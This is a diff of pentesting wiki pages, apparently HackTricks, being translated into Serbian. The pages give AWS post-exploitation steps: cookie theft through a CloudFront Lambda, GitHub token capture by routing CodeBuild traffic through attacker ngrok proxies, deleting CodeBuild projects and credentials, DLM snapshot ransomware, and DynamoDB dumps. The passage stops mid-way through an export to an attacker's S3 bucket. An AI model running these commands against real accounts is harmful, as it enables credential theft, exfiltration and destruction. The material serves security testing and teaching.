> [!NOTE]
> Need testing
> [!NAPOMENA]
> Potrebno testiranje
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## CloudFront
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-cloudfront-enum.md
@@ -12,24 +12,20 @@ For more information check:
### Man-in-the-Middle
This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
Ovaj [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) predlaže nekoliko različitih scenarija gde bi se **Lambda** mogla dodati (ili izmeniti ako se već koristi) u **komunikaciji kroz CloudFront** sa ciljem **krađe** korisničkih informacija (kao što je sesijski **kolačić**) i **modifikacije** **odgovora** (ubacivanje malicioznog JS skripta).
#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
#### scenario 1: MitM gde je CloudFront konfigurisana da pristupa nekom HTML-u iz bucket-a
- **Create** the malicious **function**.
- **Associate** it with the CloudFront distribution.
- Set the **event type to "Viewer Response"**.
- **Kreirajte** malicioznu **funkciju**.
- **Povežite** je sa CloudFront distribucijom.
- Postavite **tip događaja na "Viewer Response"**.
Accessing the response you could steal the users cookie and inject a malicious JS.
Pristupajući odgovoru, mogli biste ukrasti korisnički kolačić i ubaciti maliciozni JS.
#### scenario 2: MitM where CloudFront is already using a lambda function
#### scenario 2: MitM gde CloudFront već koristi lambda funkciju
- **Modify the code** of the lambda function to steal sensitive information
- **Izmenite kod** lambda funkcije da biste ukrali osetljive informacije.
You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
Možete proveriti [**tf kod za rekreaciju ovih scenarija ovde**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
{{#include ../../../banners/hacktricks-training.md}}

52
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
View File

@@ -4,85 +4,73 @@
## CodeBuild
For more information, check:
Za više informacija, proverite:
{{#ref}}
../../aws-services/aws-codebuild-enum.md
{{#endref}}
### Check Secrets
### Proverite Tajne
If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
Ako su kredencijali postavljeni u Codebuild za povezivanje sa Github, Gitlab ili Bitbucket u obliku ličnih tokena, lozinki ili OAuth token pristupa, ovi **kredencijali će biti sačuvani kao tajne u menadžeru tajni**.\
Stoga, ako imate pristup za čitanje menadžera tajni, moći ćete da dobijete ove tajne i pređete na povezanu platformu.
{{#ref}}
../../aws-privilege-escalation/aws-secrets-manager-privesc.md
{{#endref}}
### Abuse CodeBuild Repo Access
### Zloupotreba Pristupa CodeBuild Repo-u
In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
Da bi se konfigurisao **CodeBuild**, biće mu potreban **pristup kod repozitorijumu** koji će koristiti. Nekoliko platformi može hostovati ovaj kod:
<figure><img src="../../../../images/image (96).png" alt=""><figcaption></figcaption></figure>
The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
**CodeBuild projekat mora imati pristup** konfigurisanoj izvornoj platformi, bilo putem **IAM uloge** ili sa github/bitbucket **tokenom ili OAuth pristupom**.
An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
Napadač sa **povišenim dozvolama u CodeBuild-u** mogao bi zloupotrebiti ovaj konfigurisani pristup da otkrije kod konfigurisane repozitorije i druge gde postavljeni kredencijali imaju pristup.\
Da bi to uradio, napadač bi samo trebao da **promeni URL repozitorijuma na svaki repozitorijum kojem konfigurisani kredencijali imaju pristup** (napomena: aws web će ih sve navesti za vas):
<figure><img src="../../../../images/image (107).png" alt=""><figcaption></figcaption></figure>
And **change the Buildspec commands to exfiltrate each repo**.
I **promeni Buildspec komande da eksfiltrira svaki repozitorijum**.
> [!WARNING]
> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
> Or does he? Check the next section
> Međutim, ova **aktivnost je repetitivna i dosadna** i ako je github token konfiguran sa **dozvolama za pisanje**, napadač **neće moći da (zloupotrebi) te dozvole** jer nema pristup tokenu.\
> Ili možda ima? Proverite sledeću sekciju
### Leaking Access Tokens from AWS CodeBuild
You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
### Otkivanje Pristupnih Tokena iz AWS CodeBuild
Možete otkriti pristup dat u CodeBuild platformama poput Github-a. Proverite da li je bilo datog pristupa spoljnim platformama sa:
```bash
aws codebuild list-source-credentials
```
{{#ref}}
aws-codebuild-token-leakage.md
{{#endref}}
### `codebuild:DeleteProject`
An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
Napadač bi mogao da obriše ceo CodeBuild projekat, uzrokujući gubitak konfiguracije projekta i utičući na aplikacije koje se oslanjaju na projekat.
```bash
aws codebuild delete-project --name <value>
```
**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
**Potencijalni uticaj**: Gubitak konfiguracije projekta i prekid usluge za aplikacije koje koriste obrisani projekat.
### `codebuild:TagResource` , `codebuild:UntagResource`
An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
Napadač bi mogao da doda, izmeni ili ukloni oznake sa CodeBuild resursa, ometajući alokaciju troškova vaše organizacije, praćenje resursa i politike kontrole pristupa zasnovane na oznakama.
```bash
aws codebuild tag-resource --resource-arn <value> --tags <value>
aws codebuild untag-resource --resource-arn <value> --tag-keys <value>
```
**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
**Potencijalni uticaj**: Poremećaj alokacije troškova, praćenja resursa i politika kontrole pristupa zasnovanih na oznakama.
### `codebuild:DeleteSourceCredentials`
An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
Napadač bi mogao da obriše izvorne akreditive za Git repozitorijum, što bi uticalo na normalno funkcionisanje aplikacija koje se oslanjaju na repozitorijum.
```sql
aws codebuild delete-source-credentials --arn <value>
```
**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
**Potencijalni uticaj**: Poremećaj normalnog funkcionisanja aplikacija koje se oslanjaju na pogođeni repozitorijum zbog uklanjanja izvora kredencijala.
{{#include ../../../../banners/hacktricks-training.md}}

202
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
View File

@@ -2,73 +2,68 @@
{{#include ../../../../banners/hacktricks-training.md}}
## Recover Github/Bitbucket Configured Tokens
First, check if there are any source credentials configured that you could leak:
## Oporavak konfigurisanih tokena za Github/Bitbucket
Prvo, proverite da li postoje bilo akreditivi izvora koji su konfigurirani koje biste mogli da iscurite:
```bash
aws codebuild list-source-credentials
```
### Via Docker Image
If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
Ako otkrijete da je autentifikacija, na primer, za Github postavljena na nalogu, možete **izvršiti** tu **pristup** (**GH token ili OAuth token**) tako što ćete naterati Codebuild da **koristi specifičnu docker sliku** za pokretanje izgradnje projekta.
For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
U tu svrhu možete **napraviti novi Codebuild projekat** ili promeniti **okruženje** postojećeg da postavite **Docker sliku**.
The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
Docker slika koju možete koristiti je [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). Ovo je vrlo osnovna Docker slika koja će postaviti **env promenljive `https_proxy`**, **`http_proxy`** i **`SSL_CERT_FILE`**. Ovo će vam omogućiti da presretnete većinu saobraćaja hosta navedenog u **`https_proxy`** i **`http_proxy`** i verujete SSL CERT-u navedenom u **`SSL_CERT_FILE`**.
1. **Create & Upload your own Docker MitM image**
- Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
- **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
- You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
- Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
2. **Set the environment**
- Create a **new Codebuild project** or **modify** the environment of an existing one.
- Set the project to use the **previously generated Docker image**
1. **Kreirajte i otpremite svoju Docker MitM sliku**
- Pratite uputstva iz repozitorijuma da postavite svoju proxy IP adresu i postavite svoj SSL certifikat i **izgradite docker sliku**.
- **NE POSTAVLJAJTE `http_proxy`** da ne biste presreli zahteve ka metadata endpoint-u.
- Možete koristiti **`ngrok`** kao `ngrok tcp 4444` da postavite proxy na vaš host.
- Kada izgradite Docker sliku, **otpremite je na javni repo** (Dockerhub, ECR...)
2. **Postavite okruženje**
- Kreirajte **novi Codebuild projekat** ili **izmenite** okruženje postojećeg.
- Postavite projekat da koristi **prethodno generisanu Docker sliku**.
<figure><img src="../../../../images/image (23).png" alt=""><figcaption></figcaption></figure>
3. **Set the MitM proxy in your host**
- As indicated in the **Github repo** you could use something like:
3. **Postavite MitM proxy na vašem hostu**
- Kao što je navedeno u **Github repozitorijumu**, možete koristiti nešto poput:
```bash
mitmproxy --listen-port 4444 --allow-hosts "github.com"
```
> [!TIP]
> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
> Verzija **mitmproxy koja je korišćena je 9.0.1**, prijavljeno je da sa verzijom 10 ovo možda neće raditi.
4. **Run the build & capture the credentials**
4. **Pokrenite gradnju i zabeležite akreditive**
- You can see the token in the **Authorization** header:
- Možete videti token u **Authorization** header-u:
<figure><img src="../../../../images/image (273).png" alt=""><figcaption></figcaption></figure>
This could also be done from the aws cli with something like
<figure><img src="../../../../images/image (273).png" alt=""><figcaption></figcaption></figure>
Ovo se takođe može uraditi iz aws cli sa nečim poput
```bash
# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}
## Json
@@ -76,117 +71,102 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
# Start the build
aws codebuild start-build --project-name my-project2
```
### Via insecureSSL
**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
- First you need to enumerate the current configuration with something like:
**Codebuild** projekti imaju podešavanje pod nazivom **`insecureSsl`** koje je skriveno na vebu i može se promeniti samo putem API-ja.\
Omogućavanje ovoga omogućava Codebuild-u da se poveže sa repozitorijumom **bez provere sertifikata** koji nudi platforma.
- Prvo treba da enumerišete trenutnu konfiguraciju sa nečim poput:
```bash
aws codebuild batch-get-projects --name <proj-name>
```
- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
- Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like:
- Zatim, sa prikupljenim informacijama možete ažurirati postavku projekta **`insecureSsl`** na **`True`**. Sledeći je primer mog ažuriranja projekta, obratite pažnju na **`insecureSsl=True`** na kraju (ovo je jedina stvar koju treba da promenite iz prikupljene konfiguracije).
- Pored toga, dodajte i env varijable **http_proxy** i **https_proxy** koje upućuju na vaš tcp ngrok kao:
```bash
aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
}
]
}'
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
}
]
}'
```
- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
- Zatim pokrenite osnovni primer sa [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) na portu koji su označili proxy varijable (http_proxy i https_proxy)
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
- Na kraju, kliknite na **Build the project**, **akreditivi** će biti **poslati u čistom tekstu** (base64) na mitm port:
<figure><img src="../../../../images/image (1) (1).png" alt=""><figcaption></figcaption></figure>
### ~~Via HTTP protocol~~
### ~~Putem HTTP protokola~~
> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
> [!TIP] > **Ova ranjivost je ispravljena od strane AWS-a u nekom trenutku tokom nedelje 20. februara 2023. (mislim u petak). Tako da napadač više ne može da je zloupotrebi :)**
An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
Napadač sa **povišenim dozvolama u CodeBuild-u mogao bi da iscuri Github/Bitbucket token** koji je konfigurisan ili ako su dozvole konfigurirane putem OAuth, **privremeni OAuth token koji se koristi za pristup kodu**.
- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
- Napadač bi mogao da doda promenljive okruženja **http_proxy** i **https_proxy** u CodeBuild projekat koje upućuju na njegovu mašinu (na primer `http://5.tcp.eu.ngrok.io:14972`).
<figure><img src="../../../../images/image (232).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../../images/image (213).png" alt=""><figcaption></figcaption></figure>
- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
- Zatim, promenite URL github repozitorijuma da koristi HTTP umesto HTTPS, na primer: `http://github.com/carlospolop-forks/TestActions`
- Zatim, pokrenite osnovni primer sa [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) na portu koji su označile proxy promenljive (http_proxy i https_proxy)
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
host="0.0.0.0",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
host="0.0.0.0",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
- Next, click on **Build the project** or start the build from command line:
- Zatim kliknite na **Build the project** ili pokrenite build iz komandne linije:
```sh
aws codebuild start-build --project-name <proj-name>
```
- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
- Na kraju, **akreditivi** će biti **poslati u čistom tekstu** (base64) na mitm port:
<figure><img src="../../../../images/image (159).png" alt=""><figcaption></figcaption></figure>
> [!WARNING]
> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
> Sada će napadač moći da koristi token sa svoje mašine, da izlista sve privilegije koje ima i (zlo)upotrebi lakše nego korišćenjem CodeBuild servisa direktno.
{{#include ../../../../banners/hacktricks-training.md}}

10
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
View File

@@ -8,17 +8,11 @@
../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
{{#endref}}
### Enable / Disable Controls
To further exploit an account, you might need to disable/enable Control Tower controls:
### Omogućite / Onemogućite Kontrole
Da biste dodatno iskoristili nalog, možda ćete morati da onemogućite/omogućite kontrole Control Tower-a:
```bash
aws controltower disable-control --control-identifier <arn_control_id> --target-identifier <arn_account>
aws controltower enable-control --control-identifier <arn_control_id> --target-identifier <arn_account>
```
{{#include ../../../banners/hacktricks-training.md}}

152
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
View File

@@ -2,98 +2,90 @@
{{#include ../../../banners/hacktricks-training.md}}
## Data Lifecycle Manger (DLM)
## Menadžer životnog ciklusa podataka (DLM)
### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
Napad ransomware-a može se izvršiti šifrovanjem što je moguće više EBS volumena, a zatim brisanjem trenutnih EC2 instanci, EBS volumena i snimaka. Da bi se automatizovala ova zla aktivnost, može se koristiti Amazon DLM, šifrujući snimke sa KMS ključem iz drugog AWS naloga i prebacujući šifrovane snimke na drugi nalog. Alternativno, mogu prebaciti snimke bez šifrovanja na nalog koji upravljaju, a zatim ih tamo šifrovati. Iako nije jednostavno direktno šifrovati postojeće EBS volumene ili snimke, to je moguće učiniti kreiranjem novog volumena ili snimka.
Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
Prvo, koristiće se komanda za prikupljanje informacija o volumenima, kao što su ID instance, ID volumena, status šifrovanja, status povezivanja i tip volumena.
`aws ec2 describe-volumes`
Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
Drugo, kreiraće se politika životnog ciklusa. Ova komanda koristi DLM API za postavljanje politike životnog ciklusa koja automatski pravi dnevne snimke određenih volumena u određenom vremenu. Takođe primenjuje specifične oznake na snimke i kopira oznake sa volumena na snimke. Datoteka policyDetails.json uključuje detalje politike životnog ciklusa, kao što su ciljne oznake, raspored, ARN opcionalnog KMS ključa za šifrovanje i ciljni nalog za deljenje snimaka, koji će biti zabeleženi u CloudTrail logovima žrtve.
```bash
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
```
A template for the policy document can be seen here:
Šablon za dokument politike može se videti ovde:
```bash
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}
```
{{#include ../../../banners/hacktricks-training.md}}

290
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## DynamoDB
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
@@ -12,342 +12,292 @@ For more information check:
### `dynamodb:BatchGetItem`
An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
Napadač sa ovim dozvolama će moći da **dobije stavke iz tabela po primarnom ključu** (ne možete jednostavno tražiti sve podatke iz tabele). To znači da morate znati primarne ključeve (to možete dobiti dobijanjem metapodataka tabele (`describe-table`).
{{#tabs }}
{{#tab name="json file" }}
```bash
aws dynamodb batch-get-item --request-items file:///tmp/a.json
// With a.json
{
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
}
}
]
}
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
}
}
]
}
}
```
{{#endtab }}
{{#tab name="inline" }}
```bash
aws dynamodb batch-get-item \
--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
--region <region>
--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potencijalni uticaj:** Indirektno privesc lociranjem osetljivih informacija u tabeli
### `dynamodb:GetItem`
**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
**Slično prethodnim dozvolama** ova dozvola omogućava potencijalnom napadaču da čita vrednosti iz samo 1 tabele, s obzirom na primarni ključ unosa koji treba preuzeti:
```json
aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json
// With a.json
{
"Id" : {
"N": "205"
"N": "205"
}
}
```
With this permission it's also possible to use the **`transact-get-items`** method like:
Sa ovom dozvolom je takođe moguće koristiti metodu **`transact-get-items`** kao:
```json
aws dynamodb transact-get-items \
--transact-items file:///tmp/a.json
--transact-items file:///tmp/a.json
// With a.json
[
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
]
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potencijalni uticaj:** Indirektni privesc lociranjem osetljivih informacija u tabeli
### `dynamodb:Query`
**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
**Slično prethodnim dozvolama** ova omogućava potencijalnom napadaču da čita vrednosti iz samo 1 tabele, s obzirom na primarni ključ unosa koji treba preuzeti. Omogućava korišćenje [podskupa poređenja](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), ali jedino poređenje koje je dozvoljeno sa primarnim ključem (koje mora biti prisutno) je "EQ", tako da ne možete koristiti poređenje da dobijete celu DB u jednom zahtevu.
{{#tabs }}
{{#tab name="json file" }}
```bash
aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
// With a.json
{
// With a.json
{
"Id" : {
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
}
```
{{#endtab }}
{{#tab name="inline" }}
```bash
aws dynamodb query \
--table-name TargetTable \
--key-condition-expression "AttributeName = :value" \
--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
--region <region>
--table-name TargetTable \
--key-condition-expression "AttributeName = :value" \
--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potencijalni uticaj:** Indirektno privesc lociranjem osetljivih informacija u tabeli
### `dynamodb:Scan`
You can use this permission to **dump the entire table easily**.
Možete koristiti ovu dozvolu da **lako izbacite celu tabelu**.
```bash
aws dynamodb scan --table-name <t_name> #Get data inside the table
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potencijalni uticaj:** Indirektno privesc lociranjem osetljivih informacija u tabeli
### `dynamodb:PartiQLSelect`
You can use this permission to **dump the entire table easily**.
Možete koristiti ovu dozvolu da **lako izvučete celu tabelu**.
```bash
aws dynamodb execute-statement \
--statement "SELECT * FROM ProductCatalog"
--statement "SELECT * FROM ProductCatalog"
```
This permission also allow to perform `batch-execute-statement` like:
Ova dozvola takođe omogućava izvršavanje `batch-execute-statement` kao:
```bash
aws dynamodb batch-execute-statement \
--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
```
ali morate da navedete primarni ključ sa vrednošću, tako da nije toliko korisno.
but you need to specify the primary key with a value, so it isn't that useful.
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potencijalni uticaj:** Indirektni privesc lociranjem osetljivih informacija u tabeli
### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
Ova dozvola će omogućiti napadaču da **izveze celu tabelu u S3 kantu** po njegovom izboru:
```bash
aws dynamodb export-table-to-point-in-time \
--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
--s3-bucket <attacker_s3_bucket> \
